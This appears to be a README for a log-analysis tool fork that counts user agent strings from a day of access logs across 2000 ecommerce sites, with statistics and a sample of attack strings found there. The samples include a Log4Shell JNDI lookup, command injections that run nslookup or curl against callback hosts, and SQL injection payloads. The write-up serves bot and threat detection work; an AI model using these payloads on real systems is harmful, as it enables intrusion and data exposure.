# Logslate user agent counter

A specialized https://gitlab.com/gnufred/logslate fork used to parse the last 24 hours worth of access.log from 2000 live ecommerce websites.

Logs are from 2023-06-17.

## Steps

* Use this tool to output just the user agent from access.log files
* Combine files w/ `for f in $(find raw -name '*.log'); do echo $f; cat $f >> all.log; done`
* Sort w/ `TMPDIR=$(pwd) sort --parallel=4 -o all-sorted.log all.log sort --parallel=4 -o all-sorted.log all.log` 

## Results

The raw list of unsorted user agent size was 32.4GB and had 319,515,549 lines. It contained 965,903 unique string. After removing strings that occured less than 10 times, there was 259,430 strings left.

Here's the [threat/bots.go](https://gitlab.com/gnufred/logslate/-/blob/0.2.2/threat/bots.go) I've created based on my interpretation.

### Attacks as user agent strings

Sorting all the single occurences in a file gave me 19,000 strings for which about 15,000 of them were attacks. All the known attacks. There was nothing near a valid user agent string.

Here's some of them:

```
${10000005+9999165}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://omb44hngxcc6ukl3j6ng6q3qqo6j65kj3k3ph74m6tx2u45nalocbmqma4.oob.li}
$(nslookup -q=cname hitdqbsqqxbexe4734.bxss.me||curl hitdqbsqqxbexe4734.bxss.me)
025N3qWM')) OR 355=(SELECT 355 FROM PG_SLEEP(15))--
-1' OR 2+159-159-1=0+0+0+1 --
'+'A'.concat(70-3).concat(22*4).concat(119).concat(72).concat(101).concat(83)+(require'socket' Socket.gethostbyname('hitkw'+'fwtlyjrxfccf6.bxss.me.')[3].to_s)+'
&echo dkropa$()\x5C zrmdua\x5Cnz^xyu||a #' &echo dkropa$()\x5C zrmdua\x5Cnz^xyu||a #|\x22 &echo dkropa$()\x5C zrmdua\x5Cnz^xyu||a #
'.gethostbyname(lc('hitvf'.'zafidrbufb461.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(67).chr(115).chr(86).'
`(nslookup -q=cname hitcxruqruqqj1a9b7.bxss.me||curl hitcxruqruqqj1a9b7.bxss.me)`
```

### Then end tail

After sorting and removing the user's browsers, I had file with about 20,000 entries. There was a lot of bots with less then 1000, which I ignored. There's just so many tools, automation, in development scanners, etc.

### Lessons

For next time, I need to add a "valid browser user agent" parser to the tool to try and remove the user generated entries. There's so many variant, due to the wide range of device, os, version, browser, version, etc.
